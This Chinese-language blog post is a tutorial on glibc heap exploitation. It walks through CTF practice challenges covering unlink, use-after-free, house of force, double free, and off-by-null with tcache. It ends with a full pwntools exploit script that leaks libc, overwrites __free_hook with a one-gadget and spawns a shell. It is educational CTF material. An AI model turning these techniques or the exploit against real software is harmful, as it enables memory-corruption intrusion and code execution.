<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  

  
  <title>peanuts&#39;blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="从5道堆题看堆利用这次写的很辛苦，希望对读者有帮助。堆实质就是利用游戏规则来获胜的一种艺术。。。 unlink什么是unlink尼，众所周知smallbin，unsortedbin和largebin是doule-link的结构，当其chunk free的时候就会几率发生合并，具体情况这里就不进行详细说明了. 过程实现此处大概说明一下unlink的过程。其函数为unlink(P,BK,FD),我们来">
<meta property="og:type" content="article">
<meta property="og:title" content="peanuts&#39;blog">
<meta property="og:url" content="http://yoursite.com/2018/10/08/堆学习入门/index.html">
<meta property="og:site_name" content="peanuts&#39;blog">
<meta property="og:description" content="从5道堆题看堆利用这次写的很辛苦，希望对读者有帮助。堆实质就是利用游戏规则来获胜的一种艺术。。。 unlink什么是unlink尼，众所周知smallbin，unsortedbin和largebin是doule-link的结构，当其chunk free的时候就会几率发生合并，具体情况这里就不进行详细说明了. 过程实现此处大概说明一下unlink的过程。其函数为unlink(P,BK,FD),我们来">
<meta property="og:locale" content="default">
<meta property="og:image" content="http://yoursite.com/image/unlink/cometrue.png">
<meta property="og:image" content="http://yoursite.com/image/hacknote/add_note.png">
<meta property="og:image" content="http://yoursite.com/image/hacknote/del_note.png">
<meta property="og:image" content="http://yoursite.com/image/hacknote/print_note.png">
<meta property="og:image" content="http://yoursite.com/image/hacknote/hacknote.png">
<meta property="og:image" content="http://yoursite.com/image/bamboobox/main.png">
<meta property="og:image" content="http://yoursite.com/image/bamboobox/menu.png">
<meta property="og:image" content="http://yoursite.com/image/bamboobox/add_item.png">
<meta property="og:image" content="http://yoursite.com/image/bamboobox/change_item.png">
<meta property="og:image" content="http://yoursite.com/image/bamboobox/magic.png">
<meta property="og:image" content="http://yoursite.com/image/bamboobox/bamboobox.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/check.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/fastbin_free_chunk3.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/fastbin_malloc_chunk.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/main.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/add.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/visit.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/del.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/clean.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/magic.png">
<meta property="og:image" content="http://yoursite.com/image/lab12doub/secretgarden.png">
<meta property="og:image" content="http://yoursite.com/image/LCTF/main.png">
<meta property="og:image" content="http://yoursite.com/image/LCTF/add.png">
<meta property="og:image" content="http://yoursite.com/image/LCTF/loudong.png">
<meta property="og:updated_time" content="2019-05-16T12:16:51.845Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="peanuts&#39;blog">
<meta name="twitter:description" content="从5道堆题看堆利用这次写的很辛苦，希望对读者有帮助。堆实质就是利用游戏规则来获胜的一种艺术。。。 unlink什么是unlink尼，众所周知smallbin，unsortedbin和largebin是doule-link的结构，当其chunk free的时候就会几率发生合并，具体情况这里就不进行详细说明了. 过程实现此处大概说明一下unlink的过程。其函数为unlink(P,BK,FD),我们来">
<meta name="twitter:image" content="http://yoursite.com/image/unlink/cometrue.png">
  
    <link rel="alternate" href="/atom.xml" title="peanuts&#39;blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">peanuts&#39;blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-堆学习入门" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2018/10/08/堆学习入门/" class="article-date">
  <time datetime="2018-10-08T12:05:21.910Z" itemprop="datePublished">2018-10-08</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="从5道堆题看堆利用"><a href="#从5道堆题看堆利用" class="headerlink" title="从5道堆题看堆利用"></a>从5道堆题看堆利用</h1><p>这次写的很辛苦，希望对读者有帮助。堆实质就是利用游戏规则来获胜的一种艺术。。。</p>
<h2 id="unlink"><a href="#unlink" class="headerlink" title="unlink"></a>unlink</h2><p>什么是unlink尼，众所周知smallbin，unsortedbin和largebin是doule-link的结构，当其chunk free的时候就会几率发生合并，具体情况这里就不进行详细说明了.</p>
<h4 id="过程实现"><a href="#过程实现" class="headerlink" title="过程实现"></a>过程实现</h4><p>此处大概说明一下unlink的过程。其函数为<code>unlink(P,BK,FD)</code>,我们来一起看一下发生之后的结果。<br><img src="/image/unlink/cometrue.png" alt><br>上面的过程比较清晰，其实主要是发生堆块进行了合并，前两个堆块何在一起了，只需要一个链表了。我们在仔细想一想，一个unlink其本质就是赋值，接下来看一下源码，赋值是怎么一个过程。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">unlink(P,BK,FD)&#123;</span><br><span class="line">    FD = P -&gt; fd;</span><br><span class="line">    BK = p -&gt; bk;</span><br><span class="line">    FD -&gt; bk = BK;</span><br><span class="line">    BK -&gt; fd = fd;      </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>其实这么看来就是两个指针的交换，我们再细一点分析，具体到堆块结构FD = *(p - 0x10)，之所以是加0x10因为fd指针在堆块的位置决定的（写清楚一点，以前的自己一直不理解是为什么这样）。那么接下来就不具体写了直接写最后演算结果。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">*(P-&gt;fd+0x18) = *(P-&gt;bk)</span><br><span class="line">*(P-&gt;bk+0x10) = *(P-&gt;fd)</span><br></pre></td></tr></table></figure></p>
<p>这里还有一个检查是当前unlik加上的，具体就不说了将的文章有很多了，只要知道指针的计算我估计这基本就能理解了。</p>
<h4 id="例题Hitcon-training-lab11"><a href="#例题Hitcon-training-lab11" class="headerlink" title="例题Hitcon training lab11"></a>例题Hitcon training lab11</h4><p>这个程序有一个堆溢出的漏洞，具体程序的逻辑可以看之后的house of force中的截图。</p>
<h4 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h4><p>一、利用unlink，将我们的储存堆块的list其中一个值改变使我们有能控制的指针</p>
<p>二、接下里就是edit函数将指针改成got指针</p>
<p>三、改got表为我们需要的函数。</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><p>这里对题目讲的比较省略，因为网上的文章讲unlink的比较多，所以我这里主要总结了我自己在学习过程中遇到的问题，以及一直卡住的看</p>
<h2 id="Use-after-free"><a href="#Use-after-free" class="headerlink" title="Use after free"></a>Use after free</h2><h6 id="记录一波建立文件过程"><a href="#记录一波建立文件过程" class="headerlink" title="记录一波建立文件过程"></a>记录一波建立文件过程</h6><pre><code>mkdir + name
touch + name 
echo &apos;context&apos; &gt; name
cat name
</code></pre><h3 id="hacknote（Hitcon-training-lab10）"><a href="#hacknote（Hitcon-training-lab10）" class="headerlink" title="hacknote（Hitcon training lab10）"></a>hacknote（Hitcon training lab10）</h3><p>这是一个典型的use after free很适合初次接触的人进行练习</p>
<h4 id="程序功能分析"><a href="#程序功能分析" class="headerlink" title="程序功能分析"></a>程序功能分析</h4><p>可以发现是一个note，这里有三个功能</p>
<h5 id="add-note"><a href="#add-note" class="headerlink" title="add_note"></a>add_note</h5><p><img src="/image/hacknote/add_note.png" alt><br>可以发现add的功能是添加字条，第一个段是8字节然后用来储存函数指针<br>第二段是用来储存我们的输入的</p>
<h5 id="del-note"><a href="#del-note" class="headerlink" title="del_note"></a>del_note</h5><p><img src="/image/hacknote/del_note.png" alt><br>这里可以发现del是一个删除操作，但是并没有让指针置0所以存在use after free 漏洞</p>
<h5 id="ptint-note"><a href="#ptint-note" class="headerlink" title="ptint_note"></a>ptint_note</h5><p><img src="/image/hacknote/print_note.png" alt><br>是一个调用函数指针的一个过程</p>
<h3 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h3><pre><code>一、先申请chunk1，chunk2其中大小随意不要超过fastbin的范围就可以了
二、free chunk1
   free chunk2
三、此时fastbin中的分布是
 chunk2(8) -&gt; chunk1(8)
 chunk2(32) -&gt; chunk1(32)
四、这个时候申请一个chunk3 大小为8
   这个时候系统先分配chunk1(8)的大小存放puts函数
   然后分配chunk2(8)作为我们的context这个时候我们可以在这里写上magic函数执行获取flag
</code></pre><h4 id="exp"><a href="#exp" class="headerlink" title="exp:"></a>exp:</h4><p><img src="/image/hacknote/hacknote.png" alt></p>
<h5 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h5><p>简单的说use after free 就是利用free之后指针没有被设置成NULL然后我们可以在此malloc出来使用。</p>
<h2 id="house-of-force-Hitcon-training-lab11"><a href="#house-of-force-Hitcon-training-lab11" class="headerlink" title="house of force(Hitcon training lab11)"></a>house of force(Hitcon training lab11)</h2><h5 id="read函数"><a href="#read函数" class="headerlink" title="read函数"></a>read函数</h5><pre><code>第三个参数为unsigned符号，当-1时及0xffffffff
任意大小读
</code></pre><h4 id="利用需要满足的条件"><a href="#利用需要满足的条件" class="headerlink" title="利用需要满足的条件"></a>利用需要满足的条件</h4><pre><code>一、首先，需要存在漏洞使得我们可以控制top chunk的size域
二、其次，需要我们可以自由的控制malloc分配的大小
三、分配的次数不能受限制
</code></pre><h3 id="bamboobox"><a href="#bamboobox" class="headerlink" title="bamboobox"></a>bamboobox</h3><p>这里利用house of force 进行利用，题目的下方会对house of force进行一个原理讲解</p>
<h4 id="程序功能分析-1"><a href="#程序功能分析-1" class="headerlink" title="程序功能分析"></a>程序功能分析</h4><h5 id="main"><a href="#main" class="headerlink" title="main"></a>main</h5><p><img src="/image/bamboobox/main.png" alt><br>一、这里可以发现开始时程序分配了0x10的空间给hello message和goodbye_message函数<br>二、进行一个循环让我们进行菜单栏选项</p>
<h4 id="menu"><a href="#menu" class="headerlink" title="#menu"></a>#menu</h4><p><img src="/image/bamboobox/menu.png" alt><br>这里可以看见这里总共有5个选项其中选项1就是show item，remove就是正常的删除操作，5是正常的退出操作。接下来我们仔细看2，3两个选项</p>
<h5 id="add-a-new-item"><a href="#add-a-new-item" class="headerlink" title="add a new item"></a>add a new item</h5><p><img src="/image/bamboobox/add_item.png" alt><br>一、这里程序先让我们选择长度，惊喜惊喜！可以看出长度我们时可以任意控制的，随意malloc<br>二、然后输入们的item值就可以了</p>
<h5 id="change-the-item-in-the-box"><a href="#change-the-item-in-the-box" class="headerlink" title="change the item in the box"></a>change the item in the box</h5><p><img src="/image/bamboobox/change_item.png" alt><br>修改物品的名字，根据给定的索引，以及大小，向指定索引的物品中读取指定长度名字。这里长度由用户来读入，也存在任意长度堆溢出的漏洞。</p>
<h5 id="magic"><a href="#magic" class="headerlink" title="magic"></a>magic</h5><p><img src="/image/bamboobox/magic.png" alt><br>这里有一个我们的flag文件可以让我们利用</p>
<h3 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h3><pre><code>一、先malloc一个块
二、利用change the item in the box进行长度的修改使得我们可以覆盖到top chunk的size位置修改top chunk size=-1 （因为在其中size是无符号整数-1会被解释为0xffffff。。）所以size肯定就够我们用了
三、接着我们利用house of force的方法将top chunk的位置放在heap base地址
四、然后我们再申请一个0x10的块，去修改函数指针为我们Magic的地址
</code></pre><p>整个利用这样就完成</p>
<h4 id="exp-1"><a href="#exp-1" class="headerlink" title="exp:"></a>exp:</h4><p><img src="/image/bamboobox/bamboobox.png" alt></p>
<h5 id="总结-1"><a href="#总结-1" class="headerlink" title="总结"></a>总结</h5><pre><code>这里利用house of force。
一、这个利用过程的条件必须要满足那三点
二、然后是修改top chunk的大小
三、然后是利用malloc将top chunk放置到我们需要改写的那个地址上，可以是got表的地址可以是分配的堆块地址。
</code></pre><h2 id="Double-free（Hitcon-training-lab12）"><a href="#Double-free（Hitcon-training-lab12）" class="headerlink" title="Double free（Hitcon training lab12）"></a>Double free（Hitcon training lab12）</h2><p>故名思义，就是对一个堆块进行了两次free，<br>但是free了同一个堆块两次，其中在glibc中对此有一个检查<br><img src="/image/lab12doub/check.png" alt></p>
<p>其中是检查main_arean是否指向向了原来的一个chunk，这个就是非常容易绕过的只需要free(p1);free(p2);free(p1)就可以绕过了。</p>
<h4 id="利用过程"><a href="#利用过程" class="headerlink" title="利用过程"></a>利用过程</h4><p><img src="/image/lab12doub/fastbin_free_chunk3.png" alt><br>这是我们执行doublefree之后的图，此时malloc出chunk1，更改chunk1的fd，又因为此时chunk1是在fastbin list，也就是结构变成了下图<br><img src="/image/lab12doub/fastbin_malloc_chunk.png" alt><br>可以看见现在fastbin list中会多指向一个我们的fakebin（此时就可以进行任意地址写了）</p>
<h4 id="check-fail"><a href="#check-fail" class="headerlink" title="check_fail"></a>check_fail</h4><pre><code>if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
  errstr = &quot;malloc(): memory corruption (fast)&quot;;
errout:
  malloc_printerr (check_action, errstr, chunk2mem (victim));
  return NULL;
}
</code></pre><p>其中会有一个对fakebin，size大小的检查，如果不满足当前fastbin链中应该有的大小则会显示异常。</p>
<h3 id="例题："><a href="#例题：" class="headerlink" title="例题："></a>例题：</h3><h4 id="程序功能分析-2"><a href="#程序功能分析-2" class="headerlink" title="程序功能分析"></a>程序功能分析</h4><h5 id="main-1"><a href="#main-1" class="headerlink" title="main"></a>main</h5><p><img src="/image/lab12doub/main.png" alt><br>堆堆题一般都是些菜单题，这又是一道菜单题</p>
<h5 id="add"><a href="#add" class="headerlink" title="add"></a>add</h5><p><img src="/image/lab12doub/add.png" alt><br>add函数就是正常的malloc出堆块，然后输入一些数据，这里并没什么漏洞</p>
<h5 id="visit"><a href="#visit" class="headerlink" title="visit"></a>visit</h5><p><img src="/image/lab12doub/visit.png" alt><br>visit函数就是遍历刚才我们所有建立的东西</p>
<h5 id="del"><a href="#del" class="headerlink" title="del"></a>del</h5><p><img src="/image/lab12doub/del.png" alt><br>一个删除函数，其中对指针进行了置0所以无法使用use after free，但是这里似乎可以利用double free</p>
<h5 id="clean"><a href="#clean" class="headerlink" title="clean"></a>clean</h5><p><img src="/image/lab12doub/clean.png" alt><br>把所有已经创建了的都进行一个了删除</p>
<h5 id="magic-1"><a href="#magic-1" class="headerlink" title="magic"></a>magic</h5><p><img src="/image/lab12doub/magic.png" alt><br>这是一个get_flag的函数</p>
<h3 id="利用思路-1"><a href="#利用思路-1" class="headerlink" title="利用思路"></a>利用思路</h3><p>利用的思路还是比较明显的，利用double free进行一个got表的改写。首先add函数建立2个堆块，然后free(chunk1)-&gt;free(chunk2)-&gt;free(chunk1)进行一个检查的bypass。然后再执行add函数，进行chunk1堆块的fd指针改写，然后连续free出chunk2,chunk1和我们构造的fake_chunk（这个chunk的地址在got表上），对got表进行一个覆写，将puts函数got表改写成magic函数的地址。</p>
<h5 id="注意事项"><a href="#注意事项" class="headerlink" title="注意事项"></a>注意事项</h5><p>因为要bypass对fakebin_size的检查，所以在选got表地址的时候需要gdb调试一下，看存储的数的低四位满足要求，这里就选用了0x601ffa,刚好可以满足条件</p>
<h4 id="exp-2"><a href="#exp-2" class="headerlink" title="exp:"></a>exp:</h4><p><img src="/image/lab12doub/secretgarden.png" alt></p>
<h4 id="学习总结"><a href="#学习总结" class="headerlink" title="学习总结"></a>学习总结</h4><p>从这些3个利用方式来看，堆的学习主要是建立在对源码和对堆分配，回收等操作的熟悉的基础上。这里推荐用pwndbg进行调试，还有一些大佬会用gef和peda➕一些插件的方法进行调试，具体看个人的习惯了。</p>
<h2 id="off-by-null-amp-tacahe-amp-overlap"><a href="#off-by-null-amp-tacahe-amp-overlap" class="headerlink" title="off-by-null&amp;tacahe&amp;overlap"></a>off-by-null&amp;tacahe&amp;overlap</h2><h5 id="函数总结"><a href="#函数总结" class="headerlink" title="函数总结"></a>函数总结</h5><pre><code>strlen:不将‘\x00’这一结束符计入字符长度
strcopy:将末尾‘\x00’作为字符串一部分复制
或者是人为的在size数后填上了0
</code></pre><h3 id="off-by-null-amp-overlap"><a href="#off-by-null-amp-overlap" class="headerlink" title="off-by-null&amp;overlap"></a>off-by-null&amp;overlap</h3><p>这里讲一讲，我理解的off-by-null，其本质就是利用改写将pre_issue位改成\x00然后导致前面一个堆块莫名其妙的就free了（当然不是真的莫名其妙，详细请看堆块结构和记录，简单的说就是pre_issue是位了记录前一个堆块free or use 情况的）。接着就是利用堆块合并，获得一个free的但是其实并没有free的堆块，这就是overlap。整个过程其实说明了，off-by-null可以触发overlap，并且还是powerful的，可以用来泄漏地址。也可以用来修改fd（详细看下面）</p>
<h3 id="tacahe"><a href="#tacahe" class="headerlink" title="tacahe"></a>tacahe</h3><p>其实这个机制和fastbin很像，但是为了效率会比fastbin少很多检查。并且堆块都会在tacahe走一遍再出来给我们使用，有一些特殊情况不会比如合并了的unsortedbin。他总共有7个，满了才会用其他的类别的chunk。对double free的检查基本没有。简单的介绍一下，个人在用的时候感觉知道这些就已经差不多了。</p>
<h4 id="例题HCTF-easy-heap"><a href="#例题HCTF-easy-heap" class="headerlink" title="例题HCTF-easy_heap"></a>例题HCTF-easy_heap</h4><p>很综合的题目，复合了该有的所有知识点。</p>
<h4 id="main-2"><a href="#main-2" class="headerlink" title="main"></a>main</h4><p><img src="/image/LCTF/main.png" alt><br>这里我已经改过了一些函数的名字了，主要的逻辑就是删除，添加，打印，退出</p>
<h4 id="add-1"><a href="#add-1" class="headerlink" title="add"></a>add</h4><p><img src="/image/LCTF/add.png" alt><br><img src="/image/LCTF/loudong.png" alt><br>这里主要是一个堆块大小申请的限制，和一个off-by-null的漏洞了</p>
<h3 id="思路-1"><a href="#思路-1" class="headerlink" title="思路"></a>思路</h3><p>一、先消耗了tacahe，然后利用unsortedbin进行一个overlap导致地址泄漏</p>
<p>二、泄漏地址后，我们在对overlap的堆块进行一次malloc然后delete让其两次进入tacahe，就是我们非常熟悉的doublefree的操作了</p>
<h3 id="exp-3"><a href="#exp-3" class="headerlink" title="exp"></a>exp</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line">from pwn import*</span><br><span class="line"></span><br><span class="line">context.log_level = &apos;debug&apos;</span><br><span class="line">r = process(&apos;./easy_heap&apos;)</span><br><span class="line"></span><br><span class="line">libc = ELF(&apos;easy_heap&apos;)</span><br><span class="line">elf = ELF(&apos;easy_heap&apos;)</span><br><span class="line"></span><br><span class="line">def new(size,content):</span><br><span class="line">    r.recvuntil(&quot;?\n&gt; &quot;)</span><br><span class="line">    r.sendline(&quot;1&quot;)</span><br><span class="line">    r.recvuntil(&quot;size \n&gt; &quot;)</span><br><span class="line">    r.sendline(str(size))</span><br><span class="line">    r.recvuntil(&quot;content \n&gt; &quot;)</span><br><span class="line">    r.send(content)</span><br><span class="line"></span><br><span class="line">def newz():</span><br><span class="line">    r.recvuntil(&quot;?\n&gt; &quot;)</span><br><span class="line">    r.sendline(&quot;1&quot;)</span><br><span class="line">    r.recvuntil(&quot;size \n&gt; &quot;)</span><br><span class="line">    r.sendline(str(0))</span><br><span class="line"></span><br><span class="line">def delet(idx):</span><br><span class="line">    r.recvuntil(&quot;?\n&gt; &quot;)</span><br><span class="line">    r.sendline(&quot;2&quot;)</span><br><span class="line">    r.recvuntil(&quot;index \n&gt; &quot;)</span><br><span class="line">    r.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">def echo(idx):</span><br><span class="line">    r.recvuntil(&quot;?\n&gt; &quot;)</span><br><span class="line">    r.sendline(&quot;3&quot;)</span><br><span class="line">    r.recvuntil(&quot;index \n&gt; &quot;)</span><br><span class="line">    r.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">#MAIN EXPLOIT</span><br><span class="line"></span><br><span class="line">for i in range(10):</span><br><span class="line">    newz()</span><br><span class="line">#fill tcache</span><br><span class="line">for i in range(3,10):</span><br><span class="line">    delet(i)</span><br><span class="line">delet(0)</span><br><span class="line">delet(1)</span><br><span class="line">delet(2) </span><br><span class="line">#x = input(&quot;debug&quot;)</span><br><span class="line"></span><br><span class="line">for i in range(7):</span><br><span class="line">    newz() </span><br><span class="line">#x = input(&quot;debug33&quot;)</span><br><span class="line">newz() </span><br><span class="line">#x = input(&quot;debug33&quot;)</span><br><span class="line">newz() </span><br><span class="line">#x = input(&quot;debug33&quot;)</span><br><span class="line">newz() </span><br><span class="line">#x = input(&quot;debugggg&quot;)</span><br><span class="line"></span><br><span class="line">for i in range(0,7):</span><br><span class="line">    delet(i)</span><br><span class="line"></span><br><span class="line">delet(7)</span><br><span class="line"></span><br><span class="line">newz()</span><br><span class="line">#x = input(&quot;First&quot;) </span><br><span class="line">delet(8)</span><br><span class="line">#x = input(&quot;second&quot;)</span><br><span class="line">new(0xf8,&apos;\x00&apos;) </span><br><span class="line">#x = input(&quot;third&quot;)</span><br><span class="line">delet(0) </span><br><span class="line">delet(9) </span><br><span class="line">#x = input(&quot;debug0&quot;)</span><br><span class="line">#clean tcache</span><br><span class="line">for i in range(7):</span><br><span class="line">    newz()</span><br><span class="line">newz() </span><br><span class="line">#x = input(&quot;debug&quot;)</span><br><span class="line">echo(1)</span><br><span class="line">unsorted_bin = u64(r.recv(6).ljust(8,&apos;\x00&apos;))</span><br><span class="line">libc_base = unsorted_bin - 4111520</span><br><span class="line">#print(hex(libc_base))</span><br><span class="line">free_hook = libc_base + 4118760</span><br><span class="line">onegadget = libc_base + 0x4f322 </span><br><span class="line">#hx = input(&quot;pause&quot;)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">newz() #idx.9 ******we cut it ,get a chunk which have same point to 400</span><br><span class="line"></span><br><span class="line">delet(0) #passby counts check</span><br><span class="line">#x = input(&quot;pause&quot;)</span><br><span class="line">delet(1)</span><br><span class="line">delet(9)</span><br><span class="line"># *****double link</span><br><span class="line">#x = input(&quot;pause&quot;)</span><br><span class="line">new(0x10,p64(free_hook))</span><br><span class="line">#x = input(&quot;pause&quot;)</span><br><span class="line">newz()</span><br><span class="line">#x = input(&quot;pasue&quot;)</span><br><span class="line">new(0x10,p64(onegadget))</span><br><span class="line">#x = input(&quot;pause&quot;)</span><br><span class="line"></span><br><span class="line">delet(2)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="总结-2"><a href="#总结-2" class="headerlink" title="总结"></a>总结</h3><p>对所学进行一些总结，其中一直没有明白问题点出来了，可能大家也有这样的问题所以进行一下分享</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2018/10/08/堆学习入门/" data-id="cjvqmcljd00004h8a4kovhb70" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/10/">October 2018</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2018/10/08/堆学习入门/">(no title)</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>



  </div>
</body>
</html>